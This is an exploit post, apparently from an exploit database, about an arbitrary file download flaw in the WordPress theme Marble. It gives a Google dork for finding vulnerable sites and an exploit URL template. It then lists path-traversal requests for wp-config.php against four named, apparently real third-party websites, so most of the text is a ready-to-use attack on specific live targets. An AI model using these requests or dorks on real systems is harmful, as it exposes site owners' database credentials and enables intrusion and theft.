facebook facebook twitter rss

WordPress Theme Marble Arbitrary File Download Vulnerability

Author: Hamza HD , Published: 22-11-2014
Exploit Author : Hamza HD

Date : 20/11/2014

Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650

Version: 1.1.2

Google Dork : inurl:"/wp-content/themes/marble/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Marble suffers from Arbitrary File Download Vulnerability.

Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Like us on Facebook :